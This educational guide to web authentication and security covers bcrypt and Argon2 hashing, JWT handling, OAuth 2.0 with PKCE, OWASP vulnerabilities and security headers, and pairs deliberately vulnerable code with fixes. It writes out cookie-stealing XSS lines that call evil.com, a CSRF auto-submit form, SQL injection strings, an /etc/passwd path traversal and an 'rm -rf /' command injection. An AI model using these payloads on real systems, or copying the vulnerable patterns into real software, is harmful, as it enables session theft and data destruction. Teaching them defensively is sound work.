Security & Authentication

OAuth 2.0, JWT, OWASP Top 10, and Production Security Best Practices

🛡️ EDUCATIONAL SECURITY GUIDE

This page contains intentional examples of security vulnerabilities (XSS, SQL injection, etc.) for educational purposes. All code examples showing attacks are properly escaped and will not execute. If your browser shows security warnings, this is expected - these are teaching examples of what NOT to do in production.

Safe to view: All malicious code is displayed as text within code blocks and cannot execute.

⚠️ Security is NOT Optional:

Every senior engineer must understand authentication, authorization, and common vulnerabilities. A single security flaw can compromise an entire system. This guide covers production-ready security patterns.

1. Authentication vs Authorization

Aspect Authentication Authorization
Question Who are you? What can you do?
Purpose Verify identity Check permissions
Example Login with username/password Can user edit this document?
Methods Password, OAuth, Biometric, MFA RBAC, ABAC, ACLs
Happens First (before authorization) Second (after authentication)

2. Password Security

2.1 Never Store Plaintext Passwords

❌ NEVER DO THIS:

Storing passwords in plaintext is a critical vulnerability. If your database is compromised, all user accounts are instantly exposed.

import bcrypt
import hashlib
import os

# ❌ BAD - Plaintext password storage
class BadPasswordStorage:
    """NEVER DO THIS - Plaintext passwords"""
    def store_password(self, username, password):
        # Disaster waiting to happen
        db.save(username, password)  # Plaintext!


# ❌ BAD - Simple hashing without salt
class WeakPasswordStorage:
    """NEVER DO THIS - No salt = vulnerable to rainbow tables"""
    def store_password(self, username, password):
        # Vulnerable to rainbow table attacks
        password_hash = hashlib.sha256(password.encode()).hexdigest()
        db.save(username, password_hash)


# ✅ GOOD - Bcrypt with salt (automatic)
class SecurePasswordStorage:
    """
    Use bcrypt for password hashing

    Why bcrypt?
    - Automatic salting (unique salt per password)
    - Adaptive (can increase cost factor as hardware improves)
    - Slow by design (prevents brute force)
    """

    def hash_password(self, password: str) -> bytes:
        """Hash a password using bcrypt"""
        # Generate salt and hash password
        salt = bcrypt.gensalt(rounds=12)  # Cost factor 12
        password_hash = bcrypt.hashpw(password.encode('utf-8'), salt)
        return password_hash

    def verify_password(self, password: str, password_hash: bytes) -> bool:
        """Verify a password against its hash"""
        return bcrypt.checkpw(password.encode('utf-8'), password_hash)


# ✅ GOOD - Argon2 (even better, winner of password hashing competition)
from argon2 import PasswordHasher

class Argon2PasswordStorage:
    """
    Argon2 - Modern password hashing (recommended)

    Winner of Password Hashing Competition (2015)
    Resistant to:
    - GPU attacks
    - Side-channel attacks
    - Memory-hard (expensive to crack)
    """

    def __init__(self):
        self.ph = PasswordHasher(
            time_cost=2,       # Number of iterations
            memory_cost=65536, # Memory usage (64 MB)
            parallelism=1      # Number of threads
        )

    def hash_password(self, password: str) -> str:
        return self.ph.hash(password)

    def verify_password(self, password: str, password_hash: str) -> bool:
        try:
            self.ph.verify(password_hash, password)
            return True
        except:
            return False


# Usage example
storage = SecurePasswordStorage()

# Registration
password = "SuperSecret123!"
password_hash = storage.hash_password(password)
print(f"Hash: {password_hash}")

# Login
is_valid = storage.verify_password("SuperSecret123!", password_hash)
print(f"Password valid: {is_valid}")  # True

is_valid = storage.verify_password("WrongPassword", password_hash)
print(f"Wrong password: {is_valid}")  # False

2.2 Password Requirements

import re

class PasswordValidator:
    """
    Validate password strength

    Requirements:
    - Minimum 12 characters (NIST recommendation)
    - At least one uppercase, lowercase, digit, special char
    - Not in common password list
    - Not similar to username
    """

    def __init__(self):
        # Load common passwords (e.g., from haveibeenpwned)
        self.common_passwords = self._load_common_passwords()

    def validate_password(self, password: str, username: str = None) -> tuple[bool, list[str]]:
        """
        Validate password strength
        Returns: (is_valid, list_of_errors)
        """
        errors = []

        # Length check
        if len(password) < 12:
            errors.append("Password must be at least 12 characters")

        # Complexity checks
        if not re.search(r'[A-Z]', password):
            errors.append("Password must contain uppercase letter")

        if not re.search(r'[a-z]', password):
            errors.append("Password must contain lowercase letter")

        if not re.search(r'\d', password):
            errors.append("Password must contain digit")

        if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password):
            errors.append("Password must contain special character")

        # Common password check
        if password.lower() in self.common_passwords:
            errors.append("Password is too common")

        # Username similarity check
        if username and username.lower() in password.lower():
            errors.append("Password cannot contain username")

        return (len(errors) == 0, errors)

    def _load_common_passwords(self) -> set:
        """Load common passwords from file or API"""
        # In production, load from file or API
        return {
            'password', 'password123', '123456', 'qwerty',
            'letmein', 'welcome', 'admin', 'root'
        }


# Usage
validator = PasswordValidator()
is_valid, errors = validator.validate_password("Pass123!", "john")
if not is_valid:
    print("Password errors:")
    for error in errors:
        print(f"  - {error}")

3. JSON Web Tokens (JWT)

3.1 JWT Structure

JWT Format: header.payload.signature

3.2 JWT Authentication Flow

sequenceDiagram participant Client participant Server participant Database Note over Client,Database: Initial Login Client->>+Server: POST /login
{username, password} Server->>+Database: Verify credentials Database-->>-Server: User found ✓ Note over Server: 1. Create JWT Token
2. Sign with secret key
3. Set expiration Server-->>-Client: 200 OK
{access_token, refresh_token} Note over Client: Store tokens
(localStorage/memory) Note over Client,Database: Authenticated API Request Client->>+Server: GET /api/protected
Authorization: Bearer {JWT} Note over Server: 1. Extract JWT from header
2. Verify signature
3. Check expiration
4. Extract user claims alt Token Valid Server->>+Database: Fetch user resources Database-->>-Server: Resources Server-->>Client: 200 OK
{data} else Token Invalid/Expired Server-->>Client: 401 Unauthorized
{error: "Invalid token"} end Note over Client,Database: Token Refresh Client->>+Server: POST /refresh
{refresh_token} Note over Server: 1. Verify refresh token
2. Check if blacklisted
3. Issue new access token Server-->>-Client: 200 OK
{new_access_token} Note over Client,Database: Logout Client->>+Server: POST /logout
{refresh_token} Note over Server: Add refresh token
to blacklist Server->>+Database: Blacklist token Database-->>-Server: Token blacklisted ✓ Server-->>-Client: 200 OK Note over Client: Clear local tokens
Security Best Practices:
import jwt
import datetime
from typing import Dict, Optional

class JWTManager:
    """
    JWT token management for authentication

    Use cases:
    - Stateless authentication
    - API authentication
    - Single Sign-On (SSO)

    Security considerations:
    - Use strong secret keys (256+ bits)
    - Set short expiration times
    - Implement token refresh mechanism
    - Store secrets in environment variables
    - Use HTTPS only
    """

    def __init__(self, secret_key: str, algorithm: str = 'HS256'):
        self.secret_key = secret_key
        self.algorithm = algorithm
        self.access_token_expiry = datetime.timedelta(minutes=15)  # Short-lived
        self.refresh_token_expiry = datetime.timedelta(days=7)     # Long-lived

    def create_access_token(self, user_id: int, email: str, roles: list = None) -> str:
        """
        Create short-lived access token

        Access tokens:
        - Short expiration (15 minutes typical)
        - Contains user identity and permissions
        - Used for API requests
        """
        payload = {
            'user_id': user_id,
            'email': email,
            'roles': roles or [],
            'exp': datetime.datetime.utcnow() + self.access_token_expiry,
            'iat': datetime.datetime.utcnow(),  # Issued at
            'type': 'access'
        }

        token = jwt.encode(payload, self.secret_key, algorithm=self.algorithm)
        return token

    def create_refresh_token(self, user_id: int) -> str:
        """
        Create long-lived refresh token

        Refresh tokens:
        - Longer expiration (7 days typical)
        - Only used to get new access tokens
        - Should be stored securely (httpOnly cookie)
        - Can be revoked (store in DB)
        """
        payload = {
            'user_id': user_id,
            'exp': datetime.datetime.utcnow() + self.refresh_token_expiry,
            'iat': datetime.datetime.utcnow(),
            'type': 'refresh'
        }

        token = jwt.encode(payload, self.secret_key, algorithm=self.algorithm)
        return token

    def verify_token(self, token: str, token_type: str = 'access') -> Optional[Dict]:
        """
        Verify and decode JWT token

        Returns payload if valid, None if invalid
        """
        try:
            payload = jwt.decode(
                token,
                self.secret_key,
                algorithms=[self.algorithm]
            )

            # Verify token type
            if payload.get('type') != token_type:
                return None

            return payload

        except jwt.ExpiredSignatureError:
            print("Token expired")
            return None
        except jwt.InvalidTokenError:
            print("Invalid token")
            return None

    def refresh_access_token(self, refresh_token: str) -> Optional[str]:
        """
        Use refresh token to get new access token
        """
        payload = self.verify_token(refresh_token, token_type='refresh')

        if not payload:
            return None

        # In production, check if refresh token is revoked (DB lookup)
        # if is_token_revoked(refresh_token):
        #     return None

        # Create new access token
        user_id = payload['user_id']
        # Fetch user from DB to get current roles
        # user = db.get_user(user_id)

        return self.create_access_token(
            user_id=user_id,
            email="user@example.com",  # Fetch from DB
            roles=["user", "admin"]     # Fetch from DB
        )


# Usage example
jwt_manager = JWTManager(secret_key="your-secret-key-min-256-bits")

# Login - create tokens
access_token = jwt_manager.create_access_token(
    user_id=123,
    email="john@example.com",
    roles=["user", "admin"]
)
refresh_token = jwt_manager.create_refresh_token(user_id=123)

print(f"Access token: {access_token[:50]}...")
print(f"Refresh token: {refresh_token[:50]}...")

# API request - verify access token
payload = jwt_manager.verify_token(access_token)
if payload:
    print(f"Authenticated user: {payload['email']}")
    print(f"Roles: {payload['roles']}")

# Access token expired - use refresh token
new_access_token = jwt_manager.refresh_access_token(refresh_token)
if new_access_token:
    print("New access token issued")

3.2 JWT Security Best Practices

JWT Security Checklist:

4. OAuth 2.0

4.1 OAuth 2.0 Flows

Flow Use Case Tokens Security
Authorization Code Web apps with backend Access + Refresh Most secure (with PKCE)
Client Credentials Machine-to-machine (M2M) Access only Secure (no user context)
Implicit ❌ Deprecated (SPAs) Access only Insecure (token in URL)
Password ❌ Deprecated (legacy) Access + Refresh Low (shares password)
Auth Code + PKCE SPAs, Mobile apps Access + Refresh Secure (modern standard)

4.2 Authorization Code Flow Implementation

from flask import Flask, request, redirect, session, url_for
import requests
import secrets
import hashlib
import base64

app = Flask(__name__)
app.secret_key = secrets.token_hex(32)

class OAuth2Client:
    """
    OAuth 2.0 Authorization Code Flow with PKCE

    Flow:
    1. Generate code verifier & challenge (PKCE)
    2. Redirect user to authorization server
    3. User authenticates and approves
    4. Receive authorization code
    5. Exchange code for access token (with verifier)
    6. Use access token to access resources

    PKCE (Proof Key for Code Exchange):
    - Prevents authorization code interception
    - Required for public clients (SPAs, mobile)
    - Recommended for all OAuth clients
    """

    def __init__(self, client_id: str, client_secret: str,
                 auth_url: str, token_url: str, redirect_uri: str):
        self.client_id = client_id
        self.client_secret = client_secret
        self.auth_url = auth_url
        self.token_url = token_url
        self.redirect_uri = redirect_uri

    def generate_pkce_pair(self) -> tuple[str, str]:
        """
        Generate PKCE code verifier and challenge

        Verifier: Random string (43-128 chars)
        Challenge: SHA256(verifier), base64 encoded
        """
        # Generate code verifier (random string)
        code_verifier = base64.urlsafe_b64encode(
            secrets.token_bytes(32)
        ).decode('utf-8').rstrip('=')

        # Generate code challenge (SHA256 of verifier)
        challenge = hashlib.sha256(code_verifier.encode('utf-8')).digest()
        code_challenge = base64.urlsafe_b64encode(challenge).decode('utf-8').rstrip('=')

        return code_verifier, code_challenge

    def get_authorization_url(self, state: str, code_challenge: str) -> str:
        """
        Build authorization URL

        Parameters:
        - response_type: 'code' for authorization code flow
        - client_id: Your application's ID
        - redirect_uri: Where to send user after auth
        - scope: Permissions requested
        - state: CSRF protection token
        - code_challenge: PKCE challenge
        - code_challenge_method: 'S256' (SHA256)
        """
        params = {
            'response_type': 'code',
            'client_id': self.client_id,
            'redirect_uri': self.redirect_uri,
            'scope': 'openid profile email',
            'state': state,
            'code_challenge': code_challenge,
            'code_challenge_method': 'S256'
        }

        query_string = '&'.join([f"{k}={v}" for k, v in params.items()])
        return f"{self.auth_url}?{query_string}"

    def exchange_code_for_token(self, code: str, code_verifier: str) -> dict:
        """
        Exchange authorization code for access token

        POST to token endpoint with:
        - grant_type: 'authorization_code'
        - code: Authorization code received
        - redirect_uri: Must match original
        - client_id: Your application ID
        - code_verifier: PKCE verifier
        """
        data = {
            'grant_type': 'authorization_code',
            'code': code,
            'redirect_uri': self.redirect_uri,
            'client_id': self.client_id,
            'code_verifier': code_verifier
        }

        # For confidential clients, include client_secret
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        # Client authentication (Basic Auth)
        auth = (self.client_id, self.client_secret)

        response = requests.post(
            self.token_url,
            data=data,
            headers=headers,
            auth=auth
        )

        if response.status_code == 200:
            return response.json()
        else:
            raise Exception(f"Token exchange failed: {response.text}")

    def refresh_access_token(self, refresh_token: str) -> dict:
        """
        Use refresh token to get new access token
        """
        data = {
            'grant_type': 'refresh_token',
            'refresh_token': refresh_token,
            'client_id': self.client_id
        }

        auth = (self.client_id, self.client_secret)

        response = requests.post(
            self.token_url,
            data=data,
            auth=auth
        )

        if response.status_code == 200:
            return response.json()
        else:
            raise Exception(f"Token refresh failed: {response.text}")


# Flask routes implementing OAuth flow
oauth_client = OAuth2Client(
    client_id="your-client-id",
    client_secret="your-client-secret",
    auth_url="https://provider.com/oauth/authorize",
    token_url="https://provider.com/oauth/token",
    redirect_uri="http://localhost:5000/callback"
)

@app.route('/login')
def login():
    """
    Initiate OAuth flow
    """
    # Generate PKCE pair
    code_verifier, code_challenge = oauth_client.generate_pkce_pair()

    # Generate state for CSRF protection
    state = secrets.token_hex(16)

    # Store in session (server-side)
    session['oauth_state'] = state
    session['code_verifier'] = code_verifier

    # Redirect to authorization server
    auth_url = oauth_client.get_authorization_url(state, code_challenge)
    return redirect(auth_url)


@app.route('/callback')
def callback():
    """
    Handle OAuth callback
    """
    # Verify state (CSRF protection)
    state = request.args.get('state')
    if state != session.get('oauth_state'):
        return "Invalid state parameter", 400

    # Get authorization code
    code = request.args.get('code')
    if not code:
        error = request.args.get('error')
        return f"Authorization failed: {error}", 400

    # Exchange code for token
    code_verifier = session.get('code_verifier')
    try:
        token_response = oauth_client.exchange_code_for_token(code, code_verifier)

        # Store tokens securely
        session['access_token'] = token_response['access_token']
        session['refresh_token'] = token_response.get('refresh_token')

        # Clear PKCE values
        session.pop('oauth_state', None)
        session.pop('code_verifier', None)

        return "Login successful!"

    except Exception as e:
        return f"Token exchange failed: {str(e)}", 500


@app.route('/api/protected')
def protected_resource():
    """
    Access protected resource with access token
    """
    access_token = session.get('access_token')
    if not access_token:
        return "Unauthorized", 401

    # Use access token to call API
    headers = {'Authorization': f'Bearer {access_token}'}
    response = requests.get('https://api.provider.com/user', headers=headers)

    if response.status_code == 401:
        # Token expired, try refresh
        refresh_token = session.get('refresh_token')
        if refresh_token:
            try:
                new_tokens = oauth_client.refresh_access_token(refresh_token)
                session['access_token'] = new_tokens['access_token']
                # Retry request
                headers = {'Authorization': f'Bearer {new_tokens["access_token"]}'}
                response = requests.get('https://api.provider.com/user', headers=headers)
            except:
                return "Session expired, please login again", 401

    return response.json()

4.3 OAuth 2.0 vs OpenID Connect

Feature OAuth 2.0 OpenID Connect (OIDC)
Purpose Authorization Authentication + Authorization
Use Case API access delegation User login (SSO)
Tokens Access token (opaque) Access + ID token (JWT)
User Info Not standardized Standard claims in ID token
Examples GitHub API access Google Sign-In, "Login with Facebook"
OpenID Connect = OAuth 2.0 + Identity Layer

OIDC adds an ID token (JWT) that contains user identity information (name, email, etc.). The ID token is for the client, the access token is for the API.

5. OWASP Top 10 Web Application Vulnerabilities

5.1 Injection Attacks

SQL Injection (#3 in OWASP Top 10)

Risk: Attackers can execute arbitrary SQL commands, read/modify/delete data, or gain admin access.

import sqlite3
import psycopg2
from typing import Optional

# ❌ VULNERABLE - SQL Injection
class VulnerableUserDB:
    """NEVER DO THIS - String concatenation with user input"""

    def get_user(self, username: str) -> Optional[dict]:
        # VULNERABLE: Attacker can inject SQL
        # Input: "admin' OR '1'='1" bypasses authentication
        query = f"SELECT * FROM users WHERE username = '{username}'"
        cursor = self.conn.execute(query)
        return cursor.fetchone()

    def login(self, username: str, password: str) -> bool:
        # VULNERABLE: SQL injection
        # Input: username="admin' --" ignores password check
        query = f"""
            SELECT * FROM users
            WHERE username = '{username}' AND password = '{password}'
        """
        cursor = self.conn.execute(query)
        return cursor.fetchone() is not None


# ✅ SECURE - Parameterized queries
class SecureUserDB:
    """
    Always use parameterized queries / prepared statements

    Database drivers automatically escape user input
    Prevents SQL injection attacks
    """

    def __init__(self, db_path: str):
        self.conn = sqlite3.connect(db_path)

    def get_user(self, username: str) -> Optional[dict]:
        """Safe: Uses parameterized query"""
        query = "SELECT * FROM users WHERE username = ?"
        cursor = self.conn.execute(query, (username,))
        return cursor.fetchone()

    def login(self, username: str, password_hash: str) -> bool:
        """Safe: Parameterized query with placeholders"""
        query = """
            SELECT * FROM users
            WHERE username = ? AND password_hash = ?
        """
        cursor = self.conn.execute(query, (username, password_hash))
        return cursor.fetchone() is not None

    def search_users(self, search_term: str) -> list:
        """Safe: Even with LIKE, use parameters"""
        query = "SELECT * FROM users WHERE name LIKE ?"
        cursor = self.conn.execute(query, (f'%{search_term}%',))
        return cursor.fetchall()


# ✅ SECURE - ORM (SQLAlchemy)
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker

Base = declarative_base()

class User(Base):
    __tablename__ = 'users'
    id = Column(Integer, primary_key=True)
    username = Column(String, unique=True)
    password_hash = Column(String)

class SecureUserORM:
    """
    ORMs automatically use parameterized queries

    SQLAlchemy, Django ORM, etc. protect against SQL injection
    """

    def __init__(self, db_url: str):
        engine = create_engine(db_url)
        Session = sessionmaker(bind=engine)
        self.session = Session()

    def get_user(self, username: str) -> Optional[User]:
        """Safe: ORM uses parameters"""
        return self.session.query(User).filter(User.username == username).first()

    def search_users(self, search_term: str) -> list:
        """Safe: Even with LIKE"""
        return self.session.query(User).filter(
            User.username.like(f'%{search_term}%')
        ).all()


# Demonstrating the vulnerability
print("=== SQL Injection Example ===")
print("Malicious input: admin' OR '1'='1")
print("Resulting query: SELECT * FROM users WHERE username = 'admin' OR '1'='1'")
print("Effect: Returns all users (bypasses authentication)")

5.2 Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) (#7 in OWASP Top 10)

Risk: Attackers inject malicious scripts that execute in victims' browsers, stealing cookies, session tokens, or performing actions as the user.

from flask import Flask, render_template_string, request, escape
from markupsafe import Markup
import bleach

app = Flask(__name__)

# ❌ VULNERABLE - Reflected XSS
@app.route('/search_bad')
def search_bad():
    """NEVER DO THIS - Directly rendering user input"""
    query = request.args.get('q', '')

    # VULNERABLE: User input rendered without escaping
    # Attack: /search?q=<script>alert('XSS')</script>
    html = f"<h1>Search results for: {query}</h1>"
    return html


# ❌ VULNERABLE - Stored XSS
@app.route('/comment_bad', methods=['POST'])
def comment_bad():
    """NEVER DO THIS - Storing and displaying unsanitized input"""
    comment = request.form.get('comment')

    # VULNERABLE: Stores malicious script in database
    # Attack: comment="<script>document.location='http://evil.com?cookie='+document.cookie</script>"
    db.save_comment(comment)  # Stores XSS payload

    # Later, when displaying comments (vulnerable):
    # return f"<div>{comment}</div>"  # Executes script


# ✅ SECURE - Auto-escaping with Jinja2
@app.route('/search_safe')
def search_safe():
    """Safe: Jinja2 auto-escapes by default"""
    query = request.args.get('q', '')

    # Jinja2 automatically escapes HTML
    template = """
    

Search results for: {{ query }}

""" return render_template_string(template, query=query) # ✅ SECURE - Manual escaping @app.route('/search_escape') def search_escape(): """Safe: Explicitly escape user input""" query = request.args.get('q', '') # Escape HTML characters safe_query = escape(query) html = f"

Search results for: {safe_query}

" return html # ✅ SECURE - Sanitizing HTML input (for rich text) class HTMLSanitizer: """ Sanitize HTML input when you need to allow some HTML Use case: Blog comments, rich text editors Strategy: Whitelist allowed tags and attributes """ def __init__(self): # Allowed tags self.allowed_tags = [ 'p', 'br', 'strong', 'em', 'u', 'a', 'ul', 'ol', 'li', 'h1', 'h2', 'h3', 'blockquote', 'code', 'pre' ] # Allowed attributes per tag self.allowed_attributes = { 'a': ['href', 'title'], '*': ['class'] # Allow class on all tags } def sanitize(self, html_input: str) -> str: """ Sanitize HTML using bleach library Bleach: - Whitelists allowed tags and attributes - Removes everything else - Escapes remaining content """ clean_html = bleach.clean( html_input, tags=self.allowed_tags, attributes=self.allowed_attributes, strip=True # Remove disallowed tags ) # Also validate URLs in links clean_html = bleach.linkify( clean_html, callbacks=[self._validate_url] ) return clean_html def _validate_url(self, attrs, new=False): """Validate that URLs are safe (no javascript:)""" href = attrs.get('href', '') if href.startswith('javascript:'): return None # Remove the link # Only allow http(s) and mailto if not (href.startswith('http://') or href.startswith('https://') or href.startswith('mailto:')): return None return attrs @app.route('/comment_safe', methods=['POST']) def comment_safe(): """Safe: Sanitize HTML input""" comment = request.form.get('comment') sanitizer = HTMLSanitizer() safe_comment = sanitizer.sanitize(comment) # Store sanitized comment db.save_comment(safe_comment) return "Comment saved" # Content Security Policy (CSP) header @app.after_request def add_security_headers(response): """ Add security headers to prevent XSS Content-Security-Policy: - Defines which sources browser can load resources from - Prevents inline scripts (defeats XSS) """ response.headers['Content-Security-Policy'] = ( "default-src 'self'; " "script-src 'self' https://trusted-cdn.com; " "style-src 'self' 'unsafe-inline'; " "img-src 'self' data: https:; " "font-src 'self'; " "connect-src 'self'; " "frame-ancestors 'none'" ) # Prevent MIME type sniffing response.headers['X-Content-Type-Options'] = 'nosniff' # Enable XSS filter response.headers['X-XSS-Protection'] = '1; mode=block' return response # Example attacks and defenses print("=== XSS Attack Examples ===") print("Reflected XSS: /search?q=<script>alert('XSS')</script>") print("Stored XSS: <script>fetch('http://evil.com?cookie='+document.cookie)</script>") print("DOM XSS: document.write(location.hash)")

5.3 Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) (#8 in OWASP Top 10)

Risk: Attackers trick authenticated users into performing unwanted actions (delete account, transfer money, change email).

from flask import Flask, request, session, render_template_string
import secrets
import hmac
import hashlib

app = Flask(__name__)
app.secret_key = secrets.token_hex(32)

# ❌ VULNERABLE - No CSRF protection
@app.route('/transfer_bad', methods=['POST'])
def transfer_money_bad():
    """
    VULNERABLE: No CSRF token

    Attack scenario:
    1. User logs into bank.com
    2. User visits evil.com (attacker's site)
    3. evil.com has hidden form:
       <form action="https://bank.com/transfer" method="POST">
         <input name="to" value="attacker_account">
         <input name="amount" value="1000">
       </form>
       <script>document.forms[0].submit()</script>
    4. Form submits with user's cookies (authenticated session)
    5. Money transferred without user's knowledge
    """
    to_account = request.form.get('to')
    amount = request.form.get('amount')

    # No CSRF check - processes any POST request
    process_transfer(to_account, amount)
    return "Transfer complete"


# ✅ SECURE - CSRF token protection
class CSRFProtection:
    """
    CSRF protection using synchronizer tokens

    How it works:
    1. Generate random token on form load
    2. Store token in session (server-side)
    3. Include token in form as hidden field
    4. Verify token on form submission
    5. Reject if token missing or doesn't match

    Why it works:
    - Attacker can't read token (same-origin policy)
    - Attacker can't guess token (cryptographically random)
    - Token tied to user's session
    """

    @staticmethod
    def generate_token() -> str:
        """Generate CSRF token"""
        token = secrets.token_hex(32)
        session['csrf_token'] = token
        return token

    @staticmethod
    def validate_token(token: str) -> bool:
        """Validate CSRF token"""
        session_token = session.get('csrf_token')

        if not session_token or not token:
            return False

        # Use constant-time comparison to prevent timing attacks
        return hmac.compare_digest(session_token, token)


@app.route('/transfer_form')
def transfer_form():
    """Display form with CSRF token"""
    csrf_token = CSRFProtection.generate_token()

    template = """
    
""" return render_template_string(template, csrf_token=csrf_token) @app.route('/transfer', methods=['POST']) def transfer_money(): """Process transfer with CSRF protection""" csrf_token = request.form.get('csrf_token') # Validate CSRF token if not CSRFProtection.validate_token(csrf_token): return "CSRF token validation failed", 403 to_account = request.form.get('to') amount = request.form.get('amount') process_transfer(to_account, amount) return "Transfer complete" # ✅ SECURE - Double Submit Cookie pattern class DoubleSubmitCSRF: """ Alternative CSRF protection: Double Submit Cookie How it works: 1. Set CSRF token in cookie 2. Include same token in form/header 3. Verify cookie value == form/header value Advantage: No server-side storage needed (stateless) Works for: APIs, distributed systems """ @staticmethod def set_csrf_cookie(response): """Set CSRF token in cookie""" token = secrets.token_hex(32) response.set_cookie( 'csrf_token', token, httponly=False, # JavaScript needs to read it samesite='Strict', secure=True # HTTPS only ) return token @staticmethod def validate_token(cookie_token: str, form_token: str) -> bool: """Validate that cookie and form tokens match""" if not cookie_token or not form_token: return False return hmac.compare_digest(cookie_token, form_token) # ✅ SECURE - SameSite cookie attribute @app.route('/set_session') def set_session(): """ Use SameSite cookie attribute for CSRF protection SameSite options: - Strict: Cookie not sent on cross-site requests (best security) - Lax: Cookie sent on top-level navigation (GET only) - None: Cookie sent on all requests (requires Secure flag) Modern browsers support SameSite, provides automatic CSRF protection """ from flask import make_response response = make_response("Session set") response.set_cookie( 'session_id', 'abc123', httponly=True, # Prevents JavaScript access secure=True, # HTTPS only samesite='Strict' # CSRF protection ) return response # Flask-WTF integration (recommended for Flask) from flask_wtf import FlaskForm, CSRFProtect from wtforms import StringField, IntegerField from wtforms.validators import DataRequired csrf = CSRFProtect(app) class TransferForm(FlaskForm): """Flask-WTF automatically handles CSRF tokens""" to_account = StringField('To', validators=[DataRequired()]) amount = IntegerField('Amount', validators=[DataRequired()]) @app.route('/transfer_wtf', methods=['GET', 'POST']) def transfer_wtf(): """Using Flask-WTF (handles CSRF automatically)""" form = TransferForm() if form.validate_on_submit(): # CSRF token automatically validated to_account = form.to_account.data amount = form.amount.data process_transfer(to_account, amount) return "Transfer complete" return render_template_string("""
{{ form.hidden_tag() }} {{ form.to_account }} {{ form.amount }}
""", form=form)

5.4 Other Critical Vulnerabilities

# ✅ Insecure Deserialization Prevention
import json
import pickle

class SecureDeserialization:
    """
    Insecure deserialization can lead to Remote Code Execution (RCE)

    NEVER use pickle with untrusted data
    Use JSON instead (safe, only basic types)
    """

    @staticmethod
    def bad_deserialize(data: bytes):
        """❌ DANGEROUS: pickle can execute arbitrary code"""
        return pickle.loads(data)  # RCE vulnerability!

    @staticmethod
    def safe_deserialize(data: str) -> dict:
        """✅ SAFE: JSON only deserializes basic types"""
        return json.loads(data)


# ✅ Path Traversal Prevention
import os
from pathlib import Path

class SecureFileAccess:
    """
    Path traversal: Attacker accesses files outside intended directory

    Attack: filename="../../../etc/passwd"
    """

    def __init__(self, upload_dir: str):
        self.upload_dir = Path(upload_dir).resolve()

    def get_file_bad(self, filename: str):
        """❌ VULNERABLE: No path validation"""
        # Attack: filename="../../etc/passwd"
        filepath = os.path.join(self.upload_dir, filename)
        return open(filepath, 'r').read()

    def get_file_safe(self, filename: str):
        """✅ SAFE: Validate path stays in upload directory"""
        # Resolve absolute path
        requested_path = (self.upload_dir / filename).resolve()

        # Check if path is within upload directory
        if not str(requested_path).startswith(str(self.upload_dir)):
            raise ValueError("Invalid file path (path traversal attempt)")

        # Check if file exists
        if not requested_path.exists():
            raise FileNotFoundError("File not found")

        return requested_path.read_text()


# ✅ Command Injection Prevention
import subprocess
import shlex

class SecureCommandExecution:
    """
    Command injection: Attacker executes arbitrary system commands

    Attack: filename="file.txt; rm -rf /"
    """

    def run_command_bad(self, filename: str):
        """❌ DANGEROUS: Shell injection"""
        # Attack: filename="file.txt; rm -rf /"
        os.system(f"cat {filename}")  # Executes arbitrary commands!

    def run_command_safe(self, filename: str):
        """✅ SAFE: Use subprocess with list (no shell)"""
        # subprocess with list doesn't invoke shell
        # No command injection possible
        result = subprocess.run(
            ['cat', filename],
            capture_output=True,
            text=True,
            shell=False  # Critical: don't use shell
        )
        return result.stdout

    def run_command_with_validation(self, filename: str):
        """✅ SAFER: Validate and sanitize input"""
        # Whitelist allowed characters
        if not filename.replace('_', '').replace('.', '').isalnum():
            raise ValueError("Invalid filename")

        # Use shlex.quote for additional safety
        safe_filename = shlex.quote(filename)

        result = subprocess.run(
            ['cat', safe_filename],
            capture_output=True,
            text=True,
            shell=False
        )
        return result.stdout


# ✅ XML External Entity (XXE) Prevention
import defusedxml.ElementTree as ET

class SecureXMLParsing:
    """
    XXE attack: Attacker uses XML external entities to read files

    Attack:
    ]>
    &xxe;
    """

    def parse_xml_bad(self, xml_string: str):
        """❌ VULNERABLE: Standard library vulnerable to XXE"""
        import xml.etree.ElementTree as StandardET
        return StandardET.fromstring(xml_string)  # XXE vulnerability!

    def parse_xml_safe(self, xml_string: str):
        """✅ SAFE: Use defusedxml library"""
        # defusedxml disables external entity processing
        return ET.fromstring(xml_string)

6. Security Headers

from flask import Flask, make_response

class SecurityHeaders:
    """
    Essential HTTP security headers

    These headers protect against various attacks
    Should be set on all responses
    """

    @staticmethod
    def add_security_headers(response):
        """Add all security headers to response"""

        # Prevent clickjacking attacks
        response.headers['X-Frame-Options'] = 'DENY'

        # Prevent MIME type sniffing
        response.headers['X-Content-Type-Options'] = 'nosniff'

        # Enable XSS filter in browsers
        response.headers['X-XSS-Protection'] = '1; mode=block'

        # Content Security Policy (CSP)
        # Prevents XSS by controlling resource loading
        response.headers['Content-Security-Policy'] = (
            "default-src 'self'; "
            "script-src 'self' https://trusted-cdn.com; "
            "style-src 'self' 'unsafe-inline'; "
            "img-src 'self' data: https:; "
            "font-src 'self'; "
            "connect-src 'self'; "
            "frame-ancestors 'none'; "
            "base-uri 'self'; "
            "form-action 'self'"
        )

        # HTTP Strict Transport Security (HSTS)
        # Forces HTTPS for future requests
        response.headers['Strict-Transport-Security'] = (
            'max-age=31536000; includeSubDomains; preload'
        )

        # Referrer Policy
        # Controls how much referrer information is sent
        response.headers['Referrer-Policy'] = 'strict-origin-when-cross-origin'

        # Permissions Policy (formerly Feature Policy)
        # Disable dangerous features
        response.headers['Permissions-Policy'] = (
            'geolocation=(), '
            'microphone=(), '
            'camera=(), '
            'payment=()'
        )

        return response


# Apply to Flask app
app = Flask(__name__)

@app.after_request
def apply_security_headers(response):
    """Apply security headers to all responses"""
    return SecurityHeaders.add_security_headers(response)

7. API Security Best Practices

from functools import wraps
from flask import request, jsonify
import time

class APISecurityManager:
    """
    API security best practices
    """

    def __init__(self):
        self.rate_limiter = {}  # In production, use Redis
        self.api_keys = {}      # In production, use database

    def require_api_key(self, f):
        """
        API Key authentication

        Usage: @require_api_key
        Header: X-API-Key: your-api-key
        """
        @wraps(f)
        def decorated(*args, **kwargs):
            api_key = request.headers.get('X-API-Key')

            if not api_key:
                return jsonify({'error': 'API key required'}), 401

            # Validate API key (constant-time comparison)
            if api_key not in self.api_keys:
                return jsonify({'error': 'Invalid API key'}), 401

            # Add API key info to request context
